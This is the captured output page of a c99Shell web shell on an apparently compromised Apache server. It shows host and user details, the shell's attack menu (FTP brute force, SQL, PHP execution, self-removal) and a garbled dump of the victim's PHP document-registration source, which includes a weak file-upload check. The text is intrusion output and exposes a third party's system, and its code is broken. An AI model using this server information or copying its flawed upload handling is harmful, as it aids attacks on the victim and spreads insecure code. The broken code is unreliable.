!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/   drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processRegisterDoc.php (60.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"; }else if($method=="uploadfile"){ //uploadfile editregis $flagCommit = true; $oC->BeginTrans(); //--------------edit documents $oDoc->SearchByKey($DocID); if($oDoc->GetRecord()=="1"){ $oDoc->Edit(); $oDoc->DlcID=$DlcID; //echo "DlcID=".$oDoc->DlcID."
"; $oDoc->DtID=$DtID; //echo "DtID=".$oDoc->DtID."
"; $oDoc->DslID=$DslID; //echo "DslID=".$oDoc->DslID."
"; $oDoc->DclID=$DclID; //echo "DclID=".$oDoc->DclID."
"; $oDoc->RsID=$RsID; //echo "RsID=".$oDoc->RsID."
"; $DocDateCreate=$oDoc->DocDateCreate; $oDoc->DocDate=splitDateForm($DocDate,"/"); //echo "DocDate=".$oDoc->DocDate."
"; $oDoc->DocNo=$DocNo; //echo "DocNo=".$oDoc->DocNo."
"; $oDoc->DocSubject=$DocSubject; //echo "DocSubject=".$oDoc->DocSubject."
"; $oDoc->DocFrom=$DocFrom; //echo "DocFrom=".$oDoc->DocFrom."
"; $oDoc->DocTo=$DocTo; //echo "DocTo=".$oDoc->DocTo."
"; $oDoc->DocShortDesc=$DocShortDesc; //echo "DocShortDesc=".$oDoc->DocShortDesc."
"; $oDoc->DocRef=$DocRef; //echo "DocRef=".$oDoc->DocRef."
"; if($DocfCir=="Y"){ $DocfCir_="Y"; }else{ $DocfCir_="N"; } $oDoc->DocfCir=$DocfCir_; //echo "DocfCir=".$oDoc->DocfCir."
"; $oDoc->DocOther=$DocOther; //echo "DocOther=".$oDoc->DocOther."
"; $oDoc->CertificatePs=$CertificatePs; //echo "CertificatePs=".$oDoc->CertificatePs."
"; $oDoc->endDoc=$endDoc; //echo "endDoc=".$oDoc->endDoc."
"; if($DrsSendToPs=="Y"){ $sendToPs_="Y"; }else{ $sendToPs_="N"; } $oDoc->sendToPs=$sendToPs_; if($useMainDocNo=="Y"){ $useMainDocNo="Y"; }else{ $useMainDocNo="N"; } $oDoc->useMainDocNo=$useMainDocNo; if($DocforSign=="Y"){ $useDocforSign="Y"; }else{ $useDocforSign="N"; } $oDoc->DocforSign=$useDocforSign; $flagCommit = $oDoc->Save(); } //----------add DocAttatches $file = $_FILES['fileupload']['name']; $sizefile = $_FILES['fileupload']['size']; $filetype=strstr($file,'.'); $str = $file; $len=strlen($str); $count=0; for($i=0; $i<$len; $i++){ //echo $str{$i}."
"; $asci=ord($str{$i}); if($asci == 46){ $count++; } if($asci == 44){ $count++; } } $oSys->RSsysConfig(); $oSys->GetRecord(); $oSys->filesizebyte; $sizefileM=($oSys->filesizebyte/1024/1024); if($count>1){ if($flagCommit) $oC->CommitTrans(); else $oC->RollbackTrans(); ?>
"; }else if($sizefile>$oSys->filesizebyte || $sizefile==0){ //--- 2 MB , 2048 KB if($flagCommit) $oC->CommitTrans(); else $oC->RollbackTrans(); ?>
"; }else if($filetype!='.doc' && $filetype!='.xls' && $filetype!='.ppt' && $filetype!='.zip' && $filetype!='.rar' && $filetype!='.odt' && $filetype!='.ods' && $filetype!='.odp' && $filetype!='.pdf' && $filetype!='.jpg' && $filetype!='.gif' && $filetype!='.jpeg' && $filetype!='.png' && $filetype!='.DOC' && $filetype!='.XLS' && $filetype!='.PPT' && $filetype!='.ZIP' && $filetype!='.RAR' && $filetype!='.ODT' && $filetype!='.ODS' && $filetype!='.ODP' && $filetype!='.PDF' && $filetype!='.JPG' && $filetype!='.GIF' && $filetype!='.JPEG' && $filetype!='.PNG'){ ?>
"; }else{ $timedoc=date('Ymd_His'); $typefile = $_FILES['fileupload']['type']; $sizefile = $_FILES['fileupload']['size']; list($aa, $dot) = split('[.]', $file); $filenamemd5=md5($file); $tempfile = "../documents/".$timedoc."-".$DlcID."-".$filenamemd5.".".$dot; copy($_FILES['fileupload']['tmp_name'],$tempfile); //----search DaSeq of DocID $MaxDaSeq=$oDatt1->SearchMaxDaSeqDocID($DocID); $oDatt->AddNew(); $oDatt->DaID=$oDatt->GetNextCode(); $oDatt->DocID=$DocID; $oDatt->DaFileName=$_FILES['fileupload']['name']; $oDatt->DaUpFileName=$timedoc."-".$DlcID."-".$filenamemd5.".".$dot; if($oDatt3->SearchByDaSeqCount0($DocID)==0){ $oDatt->DaSeq=$MaxDaSeq+1; }else{ $oDatt->DaSeq=0; } $flagCommit = $oDatt->Save(); if($flagCommit) $oC->CommitTrans(); else $oC->RollbackTrans(); ?>
"; } }else if($method=="deletefiletmp"){ //deletefile addregis //echo "deletefiletmp"; $oDtmp->SearchByKey($DtmpID); $oDtmp->GetRecord(); unlink("../tmp/$oDtmp->DaUpFileName"); $oDtmp->Delete(); //---------check running $oDt1->SearchByKey($DtID); $oDt1->GetRecord(); if($oDt1->DtRunAll=="N"){ $oRd1->SearchRunningBydocGroupDtIDDept($DocGroup,$DtID,$deptId); $oRd1->GetRecord(); }else{ $oRd1->SearchRunningBydocGroupDtID($DocGroup,$DtID); $oRd1->GetRecord(); } if($RsID=="1" || $RsID=="3"){ //receiveOut //receiveIn if($DocTypeNo==$oRd1->receiveNo){ $errorRunning=1; } }else if($RsID=="2" || $RsID=="4"){ //sendOut //sendIn if($DocTypeNo==$oRd1->sendNo){ $errorRunning=1; } } ?>
"; } }else if($method=="deletefiletmp_edit"){ //deletefile tmp addregis //echo "deletefiletmp_edit"; $oDtmp->SearchByKey($DtmpID); $oDtmp->GetRecord(); unlink("../tmp/$oDtmp->DaUpFileName"); $oDtmp->Delete(); ?>
"; }else if($method=="deletefile"){ //deletefile editregis //echo "deletefile"; //--------------edit documents $oDoc->SearchByKey($DocID); if($oDoc->GetRecord()=="1"){ $oDoc->Edit(); $oDoc->DlcID=$DlcID; //echo "DlcID=".$oDoc->DlcID."
"; $oDoc->DtID=$DtID; //echo "DtID=".$oDoc->DtID."
"; $oDoc->DslID=$DslID; //echo "DslID=".$oDoc->DslID."
"; $oDoc->DclID=$DclID; //echo "DclID=".$oDoc->DclID."
"; $oDoc->RsID=$RsID; //echo "RsID=".$oDoc->RsID."
"; $DocDateCreate=$oDoc->DocDateCreate; $oDoc->DocDate=splitDateForm($DocDate,"/"); //echo "DocDate=".$oDoc->DocDate."
"; $oDoc->DocNo=$DocNo; //echo "DocNo=".$oDoc->DocNo."
"; $oDoc->DocSubject=$DocSubject; //echo "DocSubject=".$oDoc->DocSubject."
"; $oDoc->DocFrom=$DocFrom; //echo "DocFrom=".$oDoc->DocFrom."
"; $oDoc->DocTo=$DocTo; //echo "DocTo=".$oDoc->DocTo."
"; $oDoc->DocShortDesc=$DocShortDesc; //echo "DocShortDesc=".$oDoc->DocShortDesc."
"; $oDoc->DocRef=$DocRef; //echo "DocRef=".$oDoc->DocRef."
"; if($DocfCir=="Y"){ $DocfCir_="Y"; }else{ $DocfCir_="N"; } $oDoc->DocfCir=$DocfCir_; //echo "DocfCir=".$oDoc->DocfCir."
"; $oDoc->DocOther=$DocOther; //echo "DocOther=".$oDoc->DocOther."
"; $oDoc->endDoc=$endDoc; //echo "endDoc=".$oDoc->endDoc."
"; if($DrsSendToPs=="Y"){ $sendToPs_="Y"; }else{ $sendToPs_="N"; } $oDoc->sendToPs=$sendToPs_; $oDoc->DocRefAns=$DocRefAns; $oDoc->DocRefAnsID=$DocRefAnsID; if($useMainDocNo=="Y"){ $useMainDocNo="Y"; }else{ $useMainDocNo="N"; } $oDoc->useMainDocNo=$useMainDocNo; if($DocforSign=="Y"){ $useDocforSign="Y"; }else{ $useDocforSign="N"; } $oDoc->DocforSign=$useDocforSign; $oDoc->Save(); } $oDatt->SearchByKey($DtmpID); $oDatt->GetRecord(); unlink("../documents/$oDatt->DaUpFileName"); $oDatt->Delete(); $oDatt2->SearchByDocIDMoreDaSeq($oDatt->DocID,$oDatt->DaSeq); while($oDatt2->GetRecord()){ $oDatt2->Edit(); $oDatt2->DaSeq=$oDatt2->DaSeq-1; $oDatt2->Save(); } ?>
"; }else if($method=="registerDoc"){ //---------check DocNo------------------------- $oDoc1->CheckDocNo($DocNo); if(($oDoc1->GetRecord()==1) && ($RsID==1 && $DtID==1) && ($checkDocNoex!="1")){ ?>
"; }else{ //--------------------------------------------------- $flagCommit = true; $checkflagCommit="0"; $oC->BeginTrans(); //---------check running $oDt1->SearchByKey($DtID); $oDt1->GetRecord(); if($oDt1->DtRunAll=="N"){ $oRd1->SearchRunningBydocGroupDtIDDept2($DocGroup,$DtID,$deptId); $oRd1->GetRecord(); $rNo=$oRd1->receiveNo; $sNo=$oRd1->sendNo; $reNo=$oRd1->regisNo; }else if($oDt1->DtRunAll=="Y"){ $oRd1->SearchRunningBydocGroupDtID2($DocGroup,$DtID); $oRd1->GetRecord(); $rNo=$oRd1->receiveNo; $sNo=$oRd1->sendNo; $reNo=$oRd1->regisNo; } if($RsID=="1" || $RsID=="3"){ //receiveOut //receiveIn if($DocTypeNo<=$rNo){ $errorRunning=1; }else{ $errorRunning=""; } }else if($RsID=="2" || $RsID=="4"){ //sendOut //sendIn if($DocTypeNo<=$sNo){ $errorRunning=1; }else{ $errorRunning=""; } }else if($RsID=="5"){ //regisDoc if($DocTypeNo<=$reNo){ $errorRunning=1; }else{ $errorRunning=""; } } if($errorRunning==""){ //--------------add documents $oDoc->AddNew(); $oDoc->DocID=$oDoc->GetNextCode(); $e=$oDoc->GetNextCode(); $oDoc->DlcID=$DlcID; $oDoc->PtID=$PtID; $oDoc->DtID=$DtID; $oDoc->DslID=$DslID; $oDoc->DclID=$DclID; $oDoc->DsID=1; $oDoc->RsID=$RsID; $timeDocDateCreate=getNowDateTh()." ".date('H:i:s'); $oDoc->DocDateCreate=$timeDocDateCreate; $DocDateCreate=$oDoc->DocDateCreate; $oDoc->DocUserCreate=$personId; $oDoc->DocTypeNo=$DocTypeNo; $oDoc->DocDate=splitDateForm($DocDate,"/"); $oDoc->DocNo=$DocNo; $oDoc->DocSubject=$DocSubject; $oDoc->DocFrom=$DocFrom; $oDoc->DocTo=$DocTo; $oDoc->DocShortDesc=$DocShortDesc; $oDoc->DocSpeedLevelDueDate=$DocSpeedLevelDueDate; $oDoc->DocStart=$DocStart; $oDoc->DocFinish=$DocFinish; $oDoc->DocGroup=$DocGroup; $oDoc->DocRef=$DocRef; $oDoc->DocCircular=$DocCircular; if($DocfCir=="Y"){ $DocfCir_="Y"; }else{ $DocfCir_="N"; } $oDoc->DocfCir=$DocfCir_; $oDoc->DocOther=$DocOther; $oDoc->CertificatePs=$CertificatePs; $oDoc->fDelete=$fDelete; $oDoc->endDoc=$endDoc; if($DrsSendToPs=="Y"){ $sendToPs_="Y"; }else{ $sendToPs_="N"; } $oDoc->sendToPs=$sendToPs_; $oDoc->AnID=$AnID; $oDoc->DocRefAns=$DocRefAns; $oDoc->DocRefAnsID=$DocRefAnsID; if($useMainDocNo=="Y"){ $useMainDocNo="Y"; }else{ $useMainDocNo="N"; } $oDoc->useMainDocNo=$useMainDocNo; if($DocforSign=="Y"){ $useDocforSign="Y"; }else{ $useDocforSign="N"; } $oDoc->DocforSign=$useDocforSign; $flagCommit = $oDoc->Save(); if(!$flagCommit){ $checkflagCommit="1"; } //-----add DrsDocReceiveDate $oRs1->SearchByDocIDStatus3register($DocRefAnsID); $oRs1->GetRecord(); $oRs2->SearchByDrsFromDrsIDDocIDDrsMainPsY($oRs1->DrsID,$DocRefAnsID); while($oRs2->GetRecord()){ $oRs2->Edit(); $oRs2->DocRefAnsDate=$timeDocDateCreate; $flagCommit = $oRs2->Save(); if(!$flagCommit){ $checkflagCommit="1"; } } //---------------add DocReceiveSend $oRs->AddNew(); $oRs->DrsID=$oRs->GetNextCode(); $oRs->DocID=$e; $oRs->DlcID=$DlcID; $oRs->DsID=1; $oRs->DrsDocTypeNo=$DocTypeNo; $oRs->DrsReceiveDate=$DocDateCreate; $oRs->DrsReceivePersonId=$personId; $oRs->DrsSendDate=$DrsSendDate; $oRs->DrsSendPersonId=$DrsSendPersonId; $oRs->DrsSendDlcID=$DrsSendDlcID; $oRs->DrsDlcIDCreate=$DlcID; $oRs->DrsPsIDCreate=$personId; $oRs->DrsPropose=$DrsPropose; $oRs->DrsSign=$DrsSign; $oRs->DrsFromDrsID=$DrsFromDrsID; $oRs->DocGroup=$DocGroup; $flagCommit = $oRs->Save(); if(!$flagCommit){ $checkflagCommit="1"; } //--------update running doc if($RsID=="1"){ //receiveOut $oRd->SearchRunningBydocGroupDtID($DocGroup,$DtID); $oRd->GetRecord(); $oRd->Edit(); $oRd->receiveNo=$DocTypeNo; $flagCommit = $oRd->Save(); if(!$flagCommit){ $checkflagCommit="1"; } }else if($RsID=="2"){ //sendOut $oRd->SearchRunningBydocGroupDtID($DocGroup,$DtID); $oRd->GetRecord(); $oRd->Edit(); $oRd->sendNo=$DocTypeNo; $flagCommit = $oRd->Save(); if(!$flagCommit){ $checkflagCommit="1"; } }else if($RsID=="3"){ //receiveIn $oDt->SearchByKey($DtID); $oDt->GetRecord(); if($oDt->DtRunAll=="N"){ $oRd->SearchRunningBydocGroupDtIDDept($DocGroup,$DtID,$deptId); $oRd->GetRecord(); }else{ $oRd->SearchRunningBydocGroupDtID($DocGroup,$DtID); $oRd->GetRecord(); } $oRd->Edit(); $oRd->receiveNo=$DocTypeNo; $flagCommit = $oRd->Save(); if(!$flagCommit){ $checkflagCommit="1"; } }else if($RsID=="4"){ //sendIn $oDt->SearchByKey($DtID); $oDt->GetRecord(); if($oDt->DtRunAll=="N"){ $oRd->SearchRunningBydocGroupDtIDDept($DocGroup,$DtID,$deptId); $oRd->GetRecord(); }else{ $oRd->SearchRunningBydocGroupDtID($DocGroup,$DtID); $oRd->GetRecord(); } $oRd->Edit(); $oRd->sendNo=$DocTypeNo; $oRd->confirm=$oRd->confirm; $flagCommit = $oRd->Save(); if(!$flagCommit){ $checkflagCommit="1"; } }else if($RsID=="5"){ //sendIn $oDt->SearchByKey($DtID); $oDt->GetRecord(); if($oDt->DtRunAll=="N"){ $oRd->SearchRunningBydocGroupDtIDDept($DocGroup,$DtID,$deptId); $oRd->GetRecord(); }else{ $oRd->SearchRunningBydocGroupDtID($DocGroup,$DtID); $oRd->GetRecord(); } $oRd->Edit(); $oRd->regisNo=$DocTypeNo; $flagCommit = $oRd->Save(); if(!$flagCommit){ $checkflagCommit="1"; } } if($checkflagCommit=="0") $oC->CommitTrans(); else $oC->RollbackTrans(); echo ""; }else if($errorRunning=="1"){ ?>
"; } //check running
} //check DocNo }else if($method=="editRegisterDoc"){ $flagCommit = true; $checkflagCommit="0"; $oC->BeginTrans(); //echo "editRegisterDoc"; //--------------edit documents $oDoc->SearchByKey($DocID); if($oDoc->GetRecord()=="1"){ $oDoc->Edit(); $oDoc->DlcID=$DlcID; //echo "DlcID=".$oDoc->DlcID."
"; $oDoc->DtID=$DtID; //echo "DtID=".$oDoc->DtID."
"; $oDoc->DslID=$DslID; //echo "DslID=".$oDoc->DslID."
"; $oDoc->DclID=$DclID; //echo "DclID=".$oDoc->DclID."
"; $oDoc->RsID=$RsID; //echo "RsID=".$oDoc->RsID."
"; $DocDateCreate=$oDoc->DocDateCreate; $oDoc->DocDate=splitDateForm($DocDate,"/"); //echo "DocDate=".$oDoc->DocDate."
"; $oDoc->DocNo=$DocNo; //echo "DocNo=".$oDoc->DocNo."
"; $oDoc->DocSubject=$DocSubject; //echo "DocSubject=".$oDoc->DocSubject."
"; $oDoc->DocFrom=$DocFrom; //echo "DocFrom=".$oDoc->DocFrom."
"; $oDoc->DocTo=$DocTo; //echo "DocTo=".$oDoc->DocTo."
"; $oDoc->DocShortDesc=$DocShortDesc; //echo "DocShortDesc=".$oDoc->DocShortDesc."
"; $oDoc->DocRef=$DocRef; //echo "DocRef=".$oDoc->DocRef."
"; $oDoc->DocCircular=$oDoc->DocCircular; if($DocfCir=="Y"){ $DocfCir_="Y"; }else{ $DocfCir_="N"; } $oDoc->DocfCir=$DocfCir_; //echo "DocfCir=".$oDoc->DocfCir."
"; $oDoc->DocOther=$DocOther; //echo "DocOther=".$oDoc->DocOther."
"; $oDoc->endDoc=$endDoc; //echo "endDoc=".$oDoc->endDoc."
"; if($DrsSendToPs=="Y"){ $sendToPs_="Y"; }else{ $sendToPs_="N"; } $oDoc->sendToPs=$sendToPs_; $oDoc->DocRefAns=$DocRefAns; if($oDoc->DocRefAnsID!=$DocRefAnsID){ //---clear DrsDocReceiveDate $oRs1->SearchByDocIDStatus3register($oDoc->DocRefAnsID); $oRs1->GetRecord(); //echo "
oRs1->DrsID=".$oRs1->DrsID; $oRs2->SearchByDrsFromDrsIDDocIDDrsMainPsY($oRs1->DrsID,$oDoc->DocRefAnsID); while($oRs2->GetRecord()){ $oRs2->Edit(); //echo "clear old"; $oRs2->DocRefAnsDate="0000-00-00 00:00:00"; //echo "
oRs2->DocRefAnsDate=".$oRs2->DocRefAnsDate; $flagCommit = $oRs2->Save(); if(!$flagCommit){ $checkflagCommit="1"; } } //-----edit DrsDocReceiveDate $oRs1->SearchByDocIDStatus3register($DocRefAnsID); $oRs1->GetRecord(); //echo "
oRs1->DrsID=".$oRs1->DrsID; $oRs2->SearchByDrsFromDrsIDDocIDDrsMainPsY($oRs1->DrsID,$DocRefAnsID); while($oRs2->GetRecord()){ $oRs2->Edit(); //echo "
select new"; $oRs2->DocRefAnsDate=$oDoc->DocDateCreate; //echo "
oRs2->DocRefAnsDate=".$timeDocDateCreate; $flagCommit = $oRs2->Save(); if(!$flagCommit){ $checkflagCommit="1"; } } }//-$oDoc->DocRefAnsID!=$DocRefAnsID $oDoc->DocRefAnsID=$DocRefAnsID; if($useMainDocNo=="Y"){ $useMainDocNo="Y"; }else{ $useMainDocNo="N"; } $oDoc->useMainDocNo=$useMainDocNo; if($DocforSign=="Y"){ $useDocforSign="Y"; }else{ $useDocforSign="N"; } $oDoc->DocforSign=$useDocforSign; $flagCommit = $oDoc->Save(); if(!$flagCommit){ $checkflagCommit="1"; } } if($checkflagCommit=="0") $oC->CommitTrans(); else $oC->RollbackTrans(); echo ""; }else if($method=="selectCir"){ //หนังสือเวียน //echo "selectCir"; ?>
"; }else if($method=="addDocRef"){ ?>
DocDate."DocNoShow=".$oDoc->DocNo; ?> "; }else if($method=="addDocRefAns2"){ ?>
DocDate."DocNoShow=".$oDoc->DocNo; ?> "; }else if($method=="editDocRef2"){ //echo "editRegisterDoc"; //--------------edit documents $oDoc->SearchByKey($DocID); if($oDoc->GetRecord()=="1"){ $oDoc->Edit(); $oDoc->DtID=$DtID; //echo "DtID=".$oDoc->DtID."
"; $oDoc->DslID=$DslID; //echo "DslID=".$oDoc->DslID."
"; $oDoc->DclID=$DclID; //echo "DclID=".$oDoc->DclID."
"; $oDoc->RsID=$RsID; //echo "RsID=".$oDoc->RsID."
"; //$oDoc->DocDateCreate=getNowDateTh()." ".date('H:i:s'); $DocDateCreate=$oDoc->DocDateCreate; $oDoc->DocDate=splitDateForm($DocDate,"/"); //echo "DocDate=".$oDoc->DocDate."
"; $oDoc->DocSubject=$DocSubject; //echo "DocSubject=".$oDoc->DocSubject."
"; $oDoc->DocFrom=$DocFrom; //echo "DocFrom=".$oDoc->DocFrom."
"; $oDoc->DocTo=$DocTo; //echo "DocTo=".$oDoc->DocTo."
"; $oDoc->DocShortDesc=$DocShortDesc; //echo "DocShortDesc=".$oDoc->DocShortDesc."
"; if($DocNoShow!=""){ $DocRef=$DocNoShow; } if($DocSubjectShow!=""){ $DocRef=$DocRef." ".$DocSubjectShow; } if($DocDateShow ==""){ echo ""; }else{ $DocRef=$DocRef." ".abbreDate(splitDateDb2($DocDateShow ,'/')); } $oDoc->DocRef=$DocRef; //echo "DocRef=".$oDoc->DocRef."
"; if($DocfCir==""){ $DocfCir_="N"; }else if($DocfCir=="Y"){ $DocfCir_="Y"; } $oDoc->DocfCir=$DocfCir_; //echo "DocfCir=".$oDoc->DocfCir."
"; $oDoc->endDoc=$endDoc; //echo "endDoc=".$oDoc->endDoc."
"; if($DrsSendToPs=="Y"){ $sendToPs_="Y"; }else{ $sendToPs_="N"; } $oDoc->sendToPs=$sendToPs_; $oDoc->DocRefAns=$DocRefAns; $oDoc->DocRefAnsID=$DocRefAnsID; if($useMainDocNo=="Y"){ $useMainDocNo="Y"; }else{ $useMainDocNo="N"; } $oDoc->useMainDocNo=$useMainDocNo; $oDoc->Save(); } echo ""; }else if($method=="editDocRefAns2"){ $flagCommit = true; $checkflagCommit="0"; $oC->BeginTrans(); //echo "editRegisterDoc"; //--------------edit documents $oDoc->SearchByKey($DocID); if($oDoc->GetRecord()=="1"){ $oDoc->Edit(); $oDoc->DtID=$DtID; //echo "DtID=".$oDoc->DtID."
"; $oDoc->DslID=$DslID; //echo "DslID=".$oDoc->DslID."
"; $oDoc->DclID=$DclID; //echo "DclID=".$oDoc->DclID."
"; $oDoc->RsID=$RsID; //echo "RsID=".$oDoc->RsID."
"; $DocDateCreate=$oDoc->DocDateCreate; $oDoc->DocDate=splitDateForm($DocDate,"/"); //echo "DocDate=".$oDoc->DocDate."
"; $oDoc->DocSubject=$DocSubject; //echo "DocSubject=".$oDoc->DocSubject."
"; $oDoc->DocFrom=$DocFrom; //echo "DocFrom=".$oDoc->DocFrom."
"; $oDoc->DocTo=$DocTo; //echo "DocTo=".$oDoc->DocTo."
"; $oDoc->DocShortDesc=$DocShortDesc; //echo "DocShortDesc=".$oDoc->DocShortDesc."
"; if($DocNoShow!=""){ $DocRefAns=$DocNoShow; } if($DocSubjectShow!=""){ $DocRefAns=$DocRefAns." ".$DocSubjectShow; } if($DocDateShow ==""){ echo ""; }else{ $DocRefAns=$DocRefAns." ".abbreDate(splitDateDb2($DocDateShow ,'/')); } if($DocfCir==""){ $DocfCir_="N"; }else if($DocfCir=="Y"){ $DocfCir_="Y"; } $oDoc->DocfCir=$DocfCir_; //echo "DocfCir=".$oDoc->DocfCir."
"; $oDoc->endDoc=$endDoc; //echo "endDoc=".$oDoc->endDoc."
"; if($DrsSendToPs=="Y"){ $sendToPs_="Y"; }else{ $sendToPs_="N"; } $oDoc->sendToPs=$sendToPs_; $oDoc->DocRefAns=$DocRefAns; //echo "
oDoc->DocRefAnsID=".$oDoc->DocRefAnsID; //echo "
DocRefAnsID=".$DocRefAnsID; if($oDoc->DocRefAnsID!=$DocRefAnsID){ //---clear DrsDocReceiveDate $oRs1->SearchByDocIDStatus3register($oDoc->DocRefAnsID); $oRs1->GetRecord(); //echo "
oRs1->DrsID=".$oRs1->DrsID; $oRs2->SearchByDrsFromDrsIDDocIDDrsMainPsY($oRs1->DrsID,$oDoc->DocRefAnsID); while($oRs2->GetRecord()){ $oRs2->Edit(); //echo "clear old"; $oRs2->DocRefAnsDate="0000-00-00 00:00:00"; $flagCommit = $oRs2->Save(); if(!$flagCommit){ $checkflagCommit="1"; } } //-----edit DrsDocReceiveDate $oRs1->SearchByDocIDStatus3register($DocRefAnsID); $oRs1->GetRecord(); //echo "
oRs1->DrsID=".$oRs1->DrsID; $oRs2->SearchByDrsFromDrsIDDocIDDrsMainPsY($oRs1->DrsID,$DocRefAnsID); while($oRs2->GetRecord()){ $oRs2->Edit(); //echo "
select new"; $oRs2->DocRefAnsDate=$oDoc->DocDateCreate; $flagCommit = $oRs2->Save(); if(!$flagCommit){ $checkflagCommit="1"; } } }//-$oDoc->DocRefAnsID!=$DocRefAnsID $oDoc->DocRefAnsID=$DocRefAnsID; if($useMainDocNo=="Y"){ $useMainDocNo="Y"; }else{ $useMainDocNo="N"; } $oDoc->useMainDocNo=$useMainDocNo; $flagCommit = $oDoc->Save(); if(!$flagCommit){ $checkflagCommit="1"; } } if($checkflagCommit=="0") $oC->CommitTrans(); else $oC->RollbackTrans(); echo ""; }else if($method=="selectCir_edit"){ //หนังสือเวียน //echo "selectCir_edit"; //--------------edit documents $oDoc->SearchByKey($DocID); if($oDoc->GetRecord()=="1"){ $oDoc->Edit(); $oDoc->DtID=$DtID; //echo "DtID=".$oDoc->DtID."
"; $oDoc->DslID=$DslID; //echo "DslID=".$oDoc->DslID."
"; $oDoc->DclID=$DclID; //echo "DclID=".$oDoc->DclID."
"; $oDoc->RsID=$RsID; //echo "RsID=".$oDoc->RsID."
"; $DocDateCreate=$oDoc->DocDateCreate; $oDoc->DocDate=splitDateForm($DocDate,"/"); //echo "DocDate=".$oDoc->DocDate."
"; $oDoc->DocSubject=$DocSubject; //echo "DocSubject=".$oDoc->DocSubject."
"; $oDoc->DocFrom=$DocFrom; //echo "DocFrom=".$oDoc->DocFrom."
"; $oDoc->DocTo=$DocTo; //echo "DocTo=".$oDoc->DocTo."
"; $oDoc->DocShortDesc=$DocShortDesc; //echo "DocShortDesc=".$oDoc->DocShortDesc."
"; $oDoc->DocRef=$DocRef; //echo "DocRef=".$oDoc->DocRef."
"; if($DocfCir==""){ $DocfCir_="N"; }else if($DocfCir=="Y"){ $DocfCir_="Y"; } $oDoc->DocfCir=$DocfCir_; //echo "DocfCir=".$oDoc->DocfCir."
"; $oDoc->endDoc=$endDoc; //echo "endDoc=".$oDoc->endDoc."
"; if($DrsSendToPs=="Y"){ $sendToPs_="Y"; }else{ $sendToPs_="N"; } $oDoc->sendToPs=$sendToPs_; $oDoc->DocRefAns=$DocRefAns; $oDoc->DocRefAnsID=$DocRefAnsID; if($useMainDocNo=="Y"){ $useMainDocNo="Y"; }else{ $useMainDocNo="N"; } $oDoc->useMainDocNo=$useMainDocNo; $oDoc->Save(); } ?>
"; }else if($method=="showDocNomain_edit"){ //หนังสือเวียน //echo "selectCir_edit"; //--------------edit documents $oDoc->SearchByKey($DocID); if($oDoc->GetRecord()=="1"){ $oDoc->Edit(); $oDoc->DtID=$DtID; //echo "DtID=".$oDoc->DtID."
"; $oDoc->DslID=$DslID; //echo "DslID=".$oDoc->DslID."
"; $oDoc->DclID=$DclID; //echo "DclID=".$oDoc->DclID."
"; $oDoc->DsID=$oDoc->DsID; //echo "DsID=".$oDoc->DsID."
"; $oDoc->RsID=$RsID; //echo "RsID=".$oDoc->RsID."
"; $DocDateCreate=$oDoc->DocDateCreate; $oDoc->DocDate=splitDateForm($DocDate,"/"); //echo "DocDate=".$oDoc->DocDate."
"; $oDoc->DocSubject=$DocSubject; //echo "DocSubject=".$oDoc->DocSubject."
"; $oDoc->DocFrom=$DocFrom; //echo "DocFrom=".$oDoc->DocFrom."
"; $oDoc->DocTo=$DocTo; //echo "DocTo=".$oDoc->DocTo."
"; $oDoc->DocShortDesc=$DocShortDesc; //echo "DocShortDesc=".$oDoc->DocShortDesc."
"; $oDoc->DocRef=$DocRef; //echo "DocRef=".$oDoc->DocRef."
"; if($DocfCir==""){ $DocfCir_="N"; }else if($DocfCir=="Y"){ $DocfCir_="Y"; } $oDoc->DocfCir=$DocfCir_; //echo "DocfCir=".$oDoc->DocfCir."
"; $oDoc->endDoc=$endDoc; //echo "endDoc=".$oDoc->endDoc."
"; if($DrsSendToPs=="Y"){ $sendToPs_="Y"; }else{ $sendToPs_="N"; } $oDoc->sendToPs=$sendToPs_; $oDoc->DocRefAns=$DocRefAns; $oDoc->DocRefAnsID=$DocRefAnsID; if($useMainDocNo=="Y"){ $useMainDocNo="Y"; }else{ $useMainDocNo="N"; } $oDoc->useMainDocNo=$useMainDocNo; $oDoc->Save(); } ?>
"; }else if($method=="deleteRegisterDoc"){ //echo "deleteRegisterDoc"; $oDoc->SearchByKey($DocID); if($oDoc->GetRecord()=="1"){ $oDoc->Edit(); $oDoc->fDelete="Y"; if($DrsSendToPs=="Y"){ $sendToPs_="Y"; }else{ $sendToPs_="N"; } $oDoc->sendToPs=$sendToPs_; if($useMainDocNo=="Y"){ $useMainDocNo="Y"; }else{ $useMainDocNo="N"; } $oDoc->useMainDocNo=$useMainDocNo; $oDoc->Save(); } echo ""; }else if($method=="confirmRegisterDocAll"){ echo "

กรุณารอสักครู่ ระบบกำลังดำเนินการลงทะเบียนหนังสือรับรองจำนวน ".$countps." รายการ
"; $oDt1->SearchByKey($DtID); $oDt1->GetRecord(); $oSys->RSsysConfig(); $oSys->GetRecord(); $oDP2->SearchByKey($deptId); $oDP2->GetRecord(); if($oDP2->deptLevel!=0){ $deptId=SearchdeptIdlevel0($oDP2->deptParentId); } $oDP->SearchByKey($deptId); $oDP->GetRecord(); $oRd->SearchRunningBydocGroupDtID2($DocGroup,$DtID); $oRd->GetRecord(); $oRd->Edit(); $reNo=$oRd->regisNo; $oRd->regisNo=($reNo+$countps); $oRd->Save(); $UPath='uploadfile/'.$filename; $fp = fopen($UPath, "r"); $i = 1; $timeDocDateCreate=getNowDateTh()." ".date('H:i:s'); while(!feof($fp)) { $char = fgets($fp); $name = $char; $DocNo=""; if($name!=""){ //echo $name."เลขทะเบียน=".($reNo+$i)."
"; $oDoc->AddNew(); $oDoc->DocID=$oDoc->GetNextCode(); $e=$oDoc->GetNextCode(); $oDoc->DlcID=$DlcID; //echo "DlcID=".$oDoc->DlcID."
"; $oDoc->DtID=$DtID; //echo "DtID=".$oDoc->DtID."
"; $oDoc->DsID=1; $oDoc->RsID=$RsID; //echo "RsID=".$oDoc->RsID."
